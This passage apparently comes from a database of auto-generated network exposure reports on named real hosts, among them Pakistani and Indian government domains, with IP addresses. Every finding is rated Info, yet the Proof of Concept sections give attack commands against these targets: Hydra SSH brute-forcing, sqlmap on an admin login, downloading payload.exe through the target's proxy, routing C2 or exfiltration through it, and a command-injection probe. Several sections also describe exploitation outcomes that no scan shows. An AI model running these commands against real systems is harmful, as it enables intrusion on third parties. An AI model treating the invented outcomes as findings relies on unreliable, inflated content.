However, upon closer inspection, the service appears to be wrapped in a TCP wrapper (`tcpwrapped`) rather than directly exposing a TLS-enabled web server. This implies that some form of middleware or filtering appliance intercepts SSL/TLS handshakes before forwarding them to another destination.\n\nSuch setups are common in enterprise environments where firewalls or load balancers perform SSL termination. Misconfigurations in these layers can result in certificate mismatches, expired certificates, or even cleartext logging of encrypted sessions.\n\n**Attack Scenario (Proof of Concept)**  \n1. Connect to the port:\n   ```bash\n   openssl s_client -connect 124.109.52.82:443\n   ```\n2. Observe handshake failure or redirection behavior:\n   ```text\n   CONNECTED(00000003)\n   write:errno=104\n   ```\n3. Attempt direct HTTP over TLS:\n   ```bash\n   curl -k https://124.109.52.82\n   ```\n\n**Business Impact**  \nImproperly configured SSL termination points introduce significant security gaps including downgrade attacks, certificate validation bypasses, and exposure of sensitive data in transit. These issues undermine user confidence and expose the organization to legal liabilities related to privacy breaches.\n\n---\n\n### Open Port 80/tcp (http) — Microsoft-HTTPAPI/2.0 on ep.gov.pk\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | 0.0 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | network_exposure |\n| Asset / URL | ep.gov.pk |\n\n**Description**  \nPort 80/tcp on `ep.gov.pk` is running Microsoft HTTP API version 2.0, a lightweight kernel-mode driver used by Windows systems to serve HTTP content. 
Commonly found in IIS Express instances, WCF services, or self-hosted .NET applications, this setup lacks many protections offered by full-fledged web servers.\n\nExposed Microsoft-HTTPAPI endpoints are frequently targeted because they often run with elevated privileges and may contain debugging artifacts or developer backdoors left enabled in production.\n\n**Attack Scenario (Proof of Concept)**  \n1. Identify the service:\n   ```bash\n   nmap -sV -p80 ep.gov.pk\n   ```\n2. Probe for known routes or metadata:\n   ```bash\n   curl http://ep.gov.pk/api/metadata\n   ```\n3. Exploit weak authentication mechanisms:\n   ```bash\n   curl -X POST http://ep.gov.pk/api/debug --data '{\"cmd\":\"whoami\"}'\n   ```\n\n**Business Impact**  \nRunning raw Microsoft HTTP APIs in production introduces substantial risk due to limited logging capabilities, poor error handling, and frequent exposure of diagnostic endpoints. Compromise of such services can lead to remote code execution, data exfiltration, or persistent footholds inside the network perimeter.\n\n---\n\n### Open Port 443/tcp (tcpwrapped) on ep.gov.pk\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | 0.0 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | network_exposure |\n| Asset / URL | ep.gov.pk |\n\n**Description**  \nPort 443/tcp on `ep.gov.pk` returns a `tcpwrapped` response, meaning that while the port accepts connections, actual service availability depends on additional logic implemented by a wrapping daemon—typically libwrap or similar access control frameworks.\n\nThis pattern usually occurs when a reverse proxy, IDS/IPS, or application-level gateway filters incoming traffic based on source IPs, rate limits, or protocol anomalies. Although this adds a layer of obfuscation, it doesn't inherently protect against determined adversaries capable of probing beyond superficial defenses.\n\n**Attack Scenario (Proof of Concept)**  \n1. 
Establish connection:\n   ```bash\n   telnet ep.gov.pk 443\n   ```\n2. Send malformed TLS ClientHello packet:\n   ```bash\n   echo -ne '\\x16\\x03\\x01\\x00\\x01\\x01' | nc ep.gov.pk 443\n   ```\n3. Analyze responses to infer filtering behavior or bypass conditions.\n\n**Business Impact**  \nRelying on tcpwrappers instead of robust perimeter security creates false confidence among administrators. Sophisticated attackers can circumvent simple wrappers using evasion tactics, potentially gaining access to otherwise protected resources.\n\n---\n\n### Open Port 8008/tcp (http) on ep.gov.pk\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | 0.0 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | network_exposure |\n| Asset / URL | ep.gov.pk |\n\n**Description**  \nPort 8008/tcp on `ep.gov.pk` is serving HTTP traffic. As previously noted, this port is not reserved for any particular purpose and is often repurposed for alternate web interfaces, development servers, or legacy applications.\n\nGiven that both standard and non-standard HTTP ports exist simultaneously on the same domain, there is a heightened chance of inconsistent security postures across different endpoints. Each exposed service must undergo independent vulnerability assessments to ensure comprehensive coverage.\n\n**Attack Scenario (Proof of Concept)**  \n1. Access the endpoint:\n   ```bash\n   curl http://ep.gov.pk:8008/status\n   ```\n2. Look for differences in headers or content between ports 80 and 8008:\n   ```bash\n   diff <(curl -I http://ep.gov.pk/) <(curl -I http://ep.gov.pk:8008/)\n   ```\n3. Attempt brute-force login or exploit outdated components unique to this instance.\n\n**Business Impact**  \nMultiple HTTP entry points complicate patch management and monitoring efforts. 
Inconsistent deployment practices increase the probability of overlooked vulnerabilities being exploited, leading to breaches that originate from seemingly innocuous auxiliary services.\n\n---\n\n### Open Port 8015/tcp (http-proxy) — FortiGuard Web Filtering on ep.gov.pk\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | 0.0 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | network_exposure |\n| Asset / URL | ep.gov.pk |\n\n**Description**  \nPort 8015/tcp on `ep.gov.pk` functions as an HTTP proxy powered by Fortinet’s FortiGuard Web Filtering technology. Proxies of this nature are designed to filter malicious URLs, enforce acceptable usage policies, and provide centralized logging of internet activity.\n\nHowever, exposing such infrastructure publicly without adequate restrictions allows adversaries to route malicious traffic through trusted domains, evade reputation-based blocking lists, or conduct reconnaissance under the guise of legitimate organizational traffic.\n\n**Attack Scenario (Proof of Concept)**  \n1. Verify proxy functionality:\n   ```bash\n   curl --proxy http://ep.gov.pk:8015 http://example.com\n   ```\n2. Abuse proxy to mask origin of malicious requests:\n   ```bash\n   curl --proxy http://ep.gov.pk:8015 http://malicious-site.net/payload.exe > payload.exe\n   ```\n3. Perform stealthy port scans or tunneling operations through the proxy.\n\n**Business Impact**  \nPublicly accessible filtering proxies pose serious reputational and operational threats. 
They can be weaponized to launch attacks attributed to the hosting organization, violate regulatory requirements around network egress control, and consume bandwidth unnecessarily.\n\n---\n\n### Open Port 8020/tcp (http-proxy) — FortiGuard Web Filtering on ep.gov.pk\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | 0.0 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | network_exposure |\n| Asset / URL | ep.gov.pk |\n\n**Description**  \nSimilar to port 8015, port 8020/tcp on `ep.gov.pk` operates as an HTTP proxy utilizing Fortinet’s FortiGuard Web Filtering engine. Multiple proxy ports suggest either redundancy, load balancing, or distinct policy zones applied to various segments of the network.\n\nUnrestricted access to these proxies undermines the intended benefits of centralized filtering by allowing unrestricted outbound connectivity masked behind corporate infrastructure.\n\n**Attack Scenario (Proof of Concept)**  \n1. Confirm dual proxy availability:\n   ```bash\n   curl --proxy http://ep.gov.pk:8020 http://ifconfig.me/ip\n   ```\n2. Compare filtering behaviors:\n   ```bash\n   curl --proxy http://ep.gov.pk:8015 http://blocked-site.org && \\\n   curl --proxy http://ep.gov.pk:8020 http://blocked-site.org\n   ```\n3. Route C2 traffic or exfiltrate data via one of the proxies.\n\n**Business Impact**  \nAllowing unrestricted proxy access erodes the effectiveness of web filtering strategies and increases the organization’s liability in case of misuse. 
Regulatory bodies may penalize entities whose networks facilitate illicit activities, regardless of intent.","summary":{"total":10}},"summary":{"total":10}},{"_id":{"$oid":"6a1598c4dbe1aba6b35150eb"},"created_at":{"$date":"2026-05-26T12:57:40.712Z"},"url":"https://www.dahd.gov.in/","tool":"generate_network_exposure_report","result":{"url":"https://www.dahd.gov.in/","category":"network_exposure","timestamp":"2026-05-26T12:57:40.705170+00:00","report":"### Open Port 8020/tcp on 164.100.85.110\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | 0.0 (AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | network_exposure |\n| Asset / URL | 164.100.85.110 |\n\n**Description**  \nPort 8020/TCP is open on the host at IP address `164.100.85.110`. This port is commonly associated with HTTP proxy services or custom web applications. While not inherently insecure, exposing such ports without proper access controls increases the attack surface of the system by providing additional entry points for reconnaissance and exploitation.\n\nAn attacker can use standard tools like Nmap or masscan to detect open ports across large IP ranges. Once identified, further enumeration may reveal running services that could be misconfigured or vulnerable.\n\n**Attack Scenario (Proof of Concept)**  \n1. An attacker performs a SYN scan using Nmap:\n   ```bash\n   nmap -p 8020 164.100.85.110\n   ```\n2. The response confirms the port is open.\n3. Using curl or netcat, they attempt to connect to determine if an HTTP-based service is listening:\n   ```bash\n   curl http://164.100.85.110:8020/\n   ```\n4. If successful, they proceed with fingerprinting the server software and probing for known vulnerabilities or directory traversal issues.\n\n**Business Impact**  \nExposing unnecessary services increases risk exposure and provides attackers with more potential vectors for compromise. 
Even if this port does not directly lead to exploitation, it contributes to the overall visibility of infrastructure components which may otherwise remain hidden from public view.\n\n---\n\n### Open Port 443/tcp on 164.100.85.110\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | 0.0 (AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | network_exposure |\n| Asset / URL | 164.100.85.110 |\n\n**Description**  \nPort 443/TCP is open on the host at IP address `164.100.85.110`, indicating that HTTPS traffic is accepted. This is expected behavior for secure web communication but requires continuous monitoring and patch management due to its role in handling sensitive data transmission.\n\nIf improperly configured, TLS endpoints can expose weak cipher suites, expired certificates, or outdated protocols such as SSLv3 or TLS 1.0, all of which pose significant risks.\n\n**Attack Scenario (Proof of Concept)**  \n1. Attacker scans the target:\n   ```bash\n   nmap --script ssl-enum-ciphers -p 443 164.100.85.110\n   ```\n2. Output reveals support for deprecated TLS versions.\n3. They exploit protocol downgrade attacks or leverage known weaknesses in older ciphers to intercept encrypted communications.\n\n**Business Impact**  \nA compromised TLS endpoint undermines user trust and exposes confidential information during transit. Regulatory compliance frameworks such as PCI-DSS mandate strong encryption standards; failure to maintain them can result in legal penalties and reputational harm.\n\n---\n\n### Open Port 80/tcp on 164.100.85.110\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | 0.0 (AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | network_exposure |\n| Asset / URL | 164.100.85.110 |\n\n**Description**  \nPort 80/TCP is open on the host at IP address `164.100.85.110`, suggesting that unencrypted HTTP traffic is being served. 
While often used for redirecting users to HTTPS, leaving HTTP accessible without safeguards introduces plaintext interception opportunities.\n\nAttackers typically scan for common ports including 80 to identify web-accessible interfaces. Misconfigurations here—such as lack of redirects or presence of administrative panels—can facilitate unauthorized access.\n\n**Attack Scenario (Proof of Concept)**  \n1. Attacker runs:\n   ```bash\n   curl http://164.100.85.110/\n   ```\n2. Response returns content over plain HTTP instead of redirecting to HTTPS.\n3. They perform MITM attacks or inject malicious scripts into responses when transmitted over insecure networks.\n\n**Business Impact**  \nUnsecured HTTP services increase susceptibility to session hijacking, credential theft, and man-in-the-middle attacks. Organizations face liability under privacy laws like GDPR if personal data is intercepted via non-TLS connections.\n\n---\n\n### Open Port 8008/tcp on 164.100.85.110\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | 0.0 (AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | network_exposure |\n| Asset / URL | 164.100.85.110 |\n\n**Description**  \nPort 8008/TCP is open on the host at IP address `164.100.85.110`. This port is occasionally used for alternative HTTP services or internal application proxies. Its exposure should be carefully evaluated based on intended usage.\n\nSuch ports are frequently overlooked in firewall rulesets, potentially allowing unintended access to backend systems or development environments exposed to the internet.\n\n**Attack Scenario (Proof of Concept)**  \n1. Attacker discovers the port via scanning:\n   ```bash\n   nmap -sV -p 8008 164.100.85.110\n   ```\n2. Service banner indicates it's serving HTTP traffic.\n3. 
They enumerate directories using tools like dirb or gobuster:\n   ```bash\n   gobuster dir -u http://164.100.85.110:8008/ -w /usr/share/dirbuster/wordlists/directory-list-lowercase-2.3-medium.txt\n   ```\n\n**Business Impact**  \nImproperly secured alternate HTTP ports can provide attackers with access to debug interfaces, staging sites, or legacy applications containing sensitive configuration files or credentials.\n\n---\n\n### Open Port 8015/tcp on 164.100.85.110\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | 0.0 (AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | network_exposure |\n| Asset / URL | 164.100.85.110 |\n\n**Description**  \nPort 8015/TCP is open on the host at IP address `164.100.85.110`. It is sometimes used for proxy services or specialized web applications. Exposed ports outside standard ranges require justification and strict access control policies.\n\nAttackers often probe lesser-known ports to discover hidden or misconfigured services that might have fewer protections than primary web servers.\n\n**Attack Scenario (Proof of Concept)**  \n1. Attacker identifies the port via scan:\n   ```bash\n   nmap -p 8015 164.100.85.110\n   ```\n2. Connects using browser or CLI tool:\n   ```bash\n   curl http://164.100.85.110:8015/\n   ```\n3. Discovers an unprotected admin interface or test environment.\n\n**Business Impact**  \nUnauthorized access through obscure ports can bypass perimeter defenses and allow lateral movement within enterprise networks, increasing the likelihood of deeper breaches.\n\n---\n\n### Open Port 80/tcp (HTTP) on www.dahd.gov.in\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | 0.0 (AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | network_exposure |\n| Asset / URL | www.dahd.gov.in |\n\n**Description**  \nThe domain `www.dahd.gov.in` has port 80 open, accepting HTTP requests. 
Although many modern websites automatically redirect HTTP to HTTPS, maintaining an active HTTP listener without appropriate redirection logic leaves room for cleartext interception and downgrade attacks.\n\nThis configuration also allows search engines and crawlers to index insecure pages unless explicitly blocked via robots.txt or meta tags.\n\n**Attack Scenario (Proof of Concept)**  \n1. Attacker visits:\n   ```bash\n   curl http://www.dahd.gov.in/\n   ```\n2. Receives full HTML page rather than a redirect.\n3. Performs passive eavesdropping on public Wi-Fi to capture login forms or cookies sent over HTTP.\n\n**Business Impact**  \nFailure to enforce HTTPS leads to increased vulnerability to surveillance and tampering. Government domains especially must ensure end-to-end encryption to protect citizen interactions and uphold digital sovereignty principles.\n\n---\n\n### Open Port 443/tcp (HTTPS – GoIServer) on www.dahd.gov.in\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | 0.0 (AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | network_exposure |\n| Asset / URL | www.dahd.gov.in |\n\n**Description**  \nPort 443 on `www.dahd.gov.in` serves HTTPS traffic using the \"GoIServer\" product. While functional, identifying specific server technologies enables targeted exploits against known vulnerabilities tied to those implementations.\n\nAdditionally, improper TLS configurations or missing certificate validation checks can weaken cryptographic protections even when using valid certificates.\n\n**Attack Scenario (Proof of Concept)**  \n1. Attacker uses WhatWeb or similar tool:\n   ```bash\n   whatweb https://www.dahd.gov.in\n   ```\n2. Identifies server type as GoIServer.\n3. Searches CVE databases for relevant exploits targeting that software version.\n\n**Business Impact**  \nRevealing exact server details facilitates focused attacks tailored to exploit vendor-specific flaws. 
In government contexts, this transparency can undermine confidence in digital infrastructure resilience.\n\n---\n\n### Open Port 8008/tcp (HTTP) on www.dahd.gov.in\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | 0.0 (AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | network_exposure |\n| Asset / URL | www.dahd.gov.in |\n\n**Description**  \nPort 8008 on `www.dahd.gov.in` accepts HTTP traffic. As with other non-standard ports, this represents an expanded attack surface requiring explicit justification and hardening measures.\n\nSuch ports may serve internal APIs, testing environments, or legacy applications that were never meant for public consumption but inadvertently became accessible.\n\n**Attack Scenario (Proof of Concept)**  \n1. Attacker probes the port:\n   ```bash\n   curl http://www.dahd.gov.in:8008/\n   ```\n2. Gets back API documentation or debug output.\n3. Exploits undocumented endpoints or authentication bypasses present in development builds.\n\n**Business Impact**  \nExposing auxiliary HTTP services increases chances of discovering exploitable flaws in less-maintained subsystems, leading to unauthorized data access or denial-of-service conditions.\n\n---\n\n### Open Port 8015/tcp (HTTP Proxy – FortiGuard Web Filtering) on www.dahd.gov.in\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | 0.0 (AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | network_exposure |\n| Asset / URL | www.dahd.gov.in |\n\n**Description**  \nPort 8015 on `www.dahd.gov.in` operates as an HTTP proxy identified as “FortiGuard Web Filtering.” Proxies are critical intermediaries that filter and route traffic, making their exposure highly sensitive.\n\nMisconfigured proxies can act as open relays, enabling attackers to mask their identities while launching malicious activities or accessing restricted resources indirectly.\n\n**Attack Scenario (Proof of Concept)**  \n1. 
Attacker tests proxy functionality:\n   ```bash\n   curl --proxy http://www.dahd.gov.in:8015 http://example.com\n   ```\n2. Confirms successful relay capability.\n3. Uses proxy to anonymize subsequent attacks or bypass geolocation restrictions.\n\n**Business Impact**  \nCompromised or misused proxies can cause severe reputational damage and violate international cybersecurity norms. Additionally, they may enable abuse originating from organizational IP addresses, triggering blacklisting actions.\n\n---\n\n### Open Port 8020/tcp (HTTP Proxy – FortiGuard Web Filtering) on www.dahd.gov.in\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | 0.0 (AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | network_exposure |\n| Asset / URL | www.dahd.gov.in |\n\n**Description**  \nPort 8020 on `www.dahd.gov.in` functions as another instance of an HTTP proxy labeled as “FortiGuard Web Filtering.” Multiple proxy instances suggest layered filtering architecture, yet each adds complexity and potential misconfiguration risks.\n\nIf either proxy lacks sufficient access controls, adversaries can route traffic through them to evade detection or gain indirect access to internal systems.\n\n**Attack Scenario (Proof of Concept)**  \n1. Attacker verifies proxy operation:\n   ```bash\n   curl --proxy http://www.dahd.gov.in:8020 http://internal-api.local\n   ```\n2. Successfully accesses internal resource via proxy tunneling.\n3. Conducts reconnaissance or initiates lateral movement inside the network.\n\n**Business Impact**  \nProxy misuse can facilitate advanced persistent threat (APT) campaigns and insider threats. 
Government agencies relying on such infrastructure must rigorously audit and restrict proxy access to prevent covert exfiltration or infiltration attempts.\n\n---\n\n### Host Flagged on Blacklist list.quorum.to: SPAM on www.dahd.gov.in\n\n| Field | Value |\n|---|---|\n| Severity | Low |\n| CVSS Score | 2.0 (AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L) |\n| Category | network_exposure |\n| Asset / URL | www.dahd.gov.in |\n\n**Description**  \nThe domain `www.dahd.gov.in` appears on the DNS-based spam blacklist maintained by `list.quorum.to`. Being listed suggests that the domain or associated IP address has been flagged for sending unsolicited email or exhibiting behaviors consistent with spam operations.\n\nAlthough not directly exploitable, blacklisting affects deliverability of legitimate emails and damages institutional credibility online.\n\n**Attack Scenario (Proof of Concept)**  \n1. Attacker queries DNSBL database:\n   ```bash\n   dig +short TXT 110.85.100.164.list.quorum.to\n   ```\n2. Returns positive match confirming listing.\n3. Phishing campaigns spoofing the domain will likely fail delivery due to reputation issues.\n\n**Business Impact**  \nEmail blacklisting hampers official correspondence and reduces effectiveness of outreach programs. 
Public institutions depend heavily on reliable communication channels; degraded sender reputation can impede mission-critical messaging efforts.","summary":{"total":11}},"summary":{"total":11}},{"_id":{"$oid":"6a1f25adac393fe0e5b4059a"},"created_at":{"$date":"2026-06-02T18:49:17.850Z"},"url":"https://onmark.co.in/nmu/","tool":"generate_network_exposure_report","result":{"url":"https://onmark.co.in/nmu/","category":"network_exposure","timestamp":"2026-06-02T18:49:17.843570+00:00","report":"### Open Port 8015/tcp on 13.126.254.44\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | 0.0 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | network_exposure |\n| Asset / URL | 13.126.254.44 |\n\n**Description**  \nPort 8015/tcp is open on the IP address `13.126.254.44`. This port is commonly associated with HTTP proxy services or custom web applications. The exposure of such ports without proper access controls or authentication mechanisms can provide attackers with an entry point into internal systems or expose sensitive backend functionality.\n\nAn attacker typically identifies open ports using SYN scans or full TCP connection scans via tools like Nmap or Masscan. Once identified, further enumeration (e.g., banner grabbing, service detection) helps determine the nature of the service running on the port.\n\n**Attack Scenario (Proof of Concept)**  \n1. An attacker performs a port scan against `13.126.254.44` and discovers that port 8015 is open.\n2. Using `curl`, they attempt to connect to the endpoint:\n   ```bash\n   curl -v http://13.126.254.44:8015/\n   ```\n3. If the response indicates a web-based interface or API, the attacker may proceed to fingerprint the application for vulnerabilities such as directory traversal, SSRF, or misconfigured access control.\n4. 
In case of a proxy configuration, the attacker might try sending requests through it to bypass network restrictions or pivot internally.\n\n**Business Impact**  \nWhile this finding alone does not represent a direct vulnerability, exposing non-standard HTTP ports increases the attack surface. It allows potential reconnaissance by adversaries who may exploit weakly protected interfaces or leverage unintended functionality for lateral movement or privilege escalation within the infrastructure.\n\n---\n\n### Open Port 8008/tcp on 13.126.254.44\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | 0.0 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | network_exposure |\n| Asset / URL | 13.126.254.44 |\n\n**Description**  \nThe presence of an open port at 8008/tcp suggests a possible alternative HTTP server or reverse proxy configuration. Commonly used in development environments or containerized deployments, this port often hosts administrative panels, APIs, or debug endpoints which are intended for internal use only.\n\nIf improperly secured, these services can be accessed externally, leading to unauthorized access or information disclosure. Attackers routinely scan for known default ports to identify misconfigurations or legacy services left exposed to the internet.\n\n**Attack Scenario (Proof of Concept)**  \n1. A scanner detects port 8008 open on `13.126.254.44`.\n2. The attacker sends an HTTP GET request:\n   ```bash\n   curl -v http://13.126.254.44:8008/\n   ```\n3. Based on the returned headers or content, the attacker determines whether the service is vulnerable to common issues such as:\n   - Directory listing enabled\n   - Debug mode active\n   - Authentication bypass due to improper routing rules\n4. 
Further exploitation depends on identifying weaknesses in the hosted application logic or leveraging the service as a stepping stone for deeper infiltration.\n\n**Business Impact**  \nExposing auxiliary HTTP services increases risk by providing additional vectors for compromise. Even if the primary service remains secure, an overlooked secondary service could serve as a backdoor or leak sensitive system metadata, undermining overall security posture.\n\n---\n\n### Open Port 8020/tcp on 13.126.254.44\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | 0.0 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | network_exposure |\n| Asset / URL | 13.126.254.44 |\n\n**Description**  \nPort 8020/tcp being open implies another instance of a potentially unsecured HTTP-based service. Such ports are sometimes used by enterprise software suites, integration platforms, or monitoring dashboards. Without adequate protection, these services can become targets for exploitation or abuse.\n\nAttackers frequently enumerate all available ports to map out the full scope of accessible services. Any deviation from standard HTTP(S) ports warrants attention, especially when no clear business justification exists for their public availability.\n\n**Attack Scenario (Proof of Concept)**  \n1. Reconnaissance reveals port 8020 is listening on `13.126.254.44`.\n2. Initial probing with `nc` or `curl` yields basic connectivity:\n   ```bash\n   nc -zv 13.126.254.44 8020\n   ```\n3. Subsequent attempts to retrieve index pages or API documentation reveal internal paths or configurations:\n   ```bash\n   curl http://13.126.254.44:8020/api/status\n   ```\n4. 
Depending on the service type, attackers may attempt brute-force login, inject malicious payloads, or exploit outdated components running behind the port.\n\n**Business Impact**  \nUncontrolled exposure of auxiliary HTTP ports poses risks including unauthorized access to management consoles, leakage of operational intelligence, and facilitation of advanced persistent threat activities. Organizations should audit and restrict unnecessary service exposure to minimize potential footholds for intruders.\n\n---\n\n### Open Port 443/tcp Detected on 13.126.254.44\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | 0.0 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | network_exposure |\n| Asset / URL | https://onmark.co.in/nmu/ |\n\n**Description**  \nPort 443/tcp is the standard port for HTTPS traffic and is expected to be open for publicly accessible websites. However, its presence still contributes to the overall network footprint and requires continuous validation regarding TLS configuration, certificate validity, and supported cipher suites.\n\nThis port was observed during scanning directed toward `https://onmark.co.in/nmu/`, indicating that the host serves encrypted web content over SSL/TLS. Misconfigurations here—such as expired certificates, weak encryption protocols, or insecure renegotiation settings—could undermine user trust and enable man-in-the-middle attacks.\n\n**Attack Scenario (Proof of Concept)**  \n1. Scanning confirms port 443 is open on `13.126.254.44`.\n2. An attacker uses `openssl s_client` to inspect the TLS handshake:\n   ```bash\n   openssl s_client -connect 13.126.254.44:443 -servername onmark.co.in\n   ```\n3. They analyze the output for deprecated protocols (SSLv3, TLS 1.0), weak ciphers, or missing security extensions (HSTS, OCSP stapling).\n4. 
If vulnerabilities exist, the attacker may perform downgrade attacks or intercept communications under certain conditions.\n\n**Business Impact**  \nAlthough essential for secure communication, improper handling of HTTPS services undermines confidentiality and integrity guarantees. Poor TLS hygiene can lead to browser warnings, reduced customer confidence, compliance violations, and susceptibility to eavesdropping or session hijacking.\n\n---\n\n### Open SSH Service on Port 24/tcp – OpenSSH 7.6p1 Ubuntu 4ubuntu0.7\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | 0.0 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | network_exposure |\n| Asset / URL | onmark.co.in |\n\n**Description**  \nSSH service is exposed on port 24/tcp instead of the default port 22/tcp. Running SSH on a non-standard port is sometimes employed as a rudimentary defense mechanism to reduce automated bot traffic; however, it provides minimal actual security benefit since port scanning easily reveals the service's location.\n\nVersion `OpenSSH 7.6p1` has known vulnerabilities depending on patch level and distribution-specific modifications. While version 7.6p1 itself is relatively old, the specific build (`Ubuntu 4ubuntu0.7`) includes patches up to a certain date but may still lack fixes for more recent CVEs unless explicitly updated.\n\n**Attack Scenario (Proof of Concept)**  \n1. Enumeration shows SSH service running on port 24/tcp of `onmark.co.in`.\n2. Attacker initiates a brute-force attack using Hydra:\n   ```bash\n   hydra -l admin -P passwords.txt ssh://onmark.co.in:24\n   ```\n3. Alternatively, they check for known exploits related to OpenSSH versions prior to 8.x:\n   ```bash\n   searchsploit openssh 7.6\n   ```\n4. Successful authentication grants shell access, enabling further compromise of the underlying system.\n\n**Business Impact**  \nSSH exposure—even on a non-default port—represents a critical remote access vector. 
Compromise of SSH credentials or exploitation of protocol-level flaws can result in complete system takeover, data exfiltration, persistence establishment, and lateral movement across the network.\n\n---\n\n### Open HTTP Service on Port 443/tcp – Apache httpd\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | 0.0 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | network_exposure |\n| Asset / URL | onmark.co.in |\n\n**Description**  \nStandard HTTPS service is provided by Apache httpd on port 443/tcp for domain `onmark.co.in`. As one of the most widely deployed web servers globally, Apache installations require careful tuning and regular updates to mitigate risks stemming from misconfiguration or outdated modules.\n\nDespite serving encrypted traffic, the server’s configuration—including virtual hosts, allowed methods, module usage, and error page disclosures—can inadvertently expose internal details or facilitate abuse if not properly hardened.\n\n**Attack Scenario (Proof of Concept)**  \n1. Attacker connects to `https://onmark.co.in` and inspects HTTP headers:\n   ```bash\n   curl -I https://onmark.co.in\n   ```\n2. Observing verbose server identification strings (e.g., `Server: Apache/2.4.x`), they look up associated vulnerabilities:\n   ```bash\n   searchsploit apache 2.4\n   ```\n3. They test for dangerous HTTP methods:\n   ```bash\n   curl -X TRACE https://onmark.co.in\n   ```\n4. If TRACE is enabled, Cross-Site Tracing (XST) becomes possible, allowing theft of cookies via XSS vectors.\n\n**Business Impact**  \nImproperly configured web servers increase organizational risk by revealing stack fingerprints, permitting unsafe operations, or hosting vulnerable third-party modules. 
These factors collectively contribute to higher chances of successful web-based attacks targeting both clients and backend infrastructure.\n\n---\n\n### Open HTTP Service on Port 8008/tcp\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | 0.0 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | network_exposure |\n| Asset / URL | onmark.co.in |\n\n**Description**  \nA secondary HTTP listener operates on port 8008/tcp for `onmark.co.in`. Non-standard HTTP ports often indicate development/test environments, reverse proxies, or microservices architectures. When unintentionally exposed to the public internet, these services may lack the same degree of hardening applied to mainline production sites.\n\nSuch services frequently omit logging, rate limiting, or authentication layers, making them attractive targets for initial reconnaissance and exploitation.\n\n**Attack Scenario (Proof of Concept)**  \n1. Attacker identifies open port 8008 via scan:\n   ```bash\n   nmap -p 8008 onmark.co.in\n   ```\n2. They probe for directory listings or hidden resources:\n   ```bash\n   dirb http://onmark.co.in:8008/\n   ```\n3. Upon discovering unprotected administrative endpoints or debug features, they attempt injection attacks or credential harvesting:\n   ```bash\n   sqlmap -u \"http://onmark.co.in:8008/admin/login\" --batch\n   ```\n\n**Business Impact**  \nSecondary HTTP services pose significant threats due to relaxed oversight and inconsistent deployment practices. 
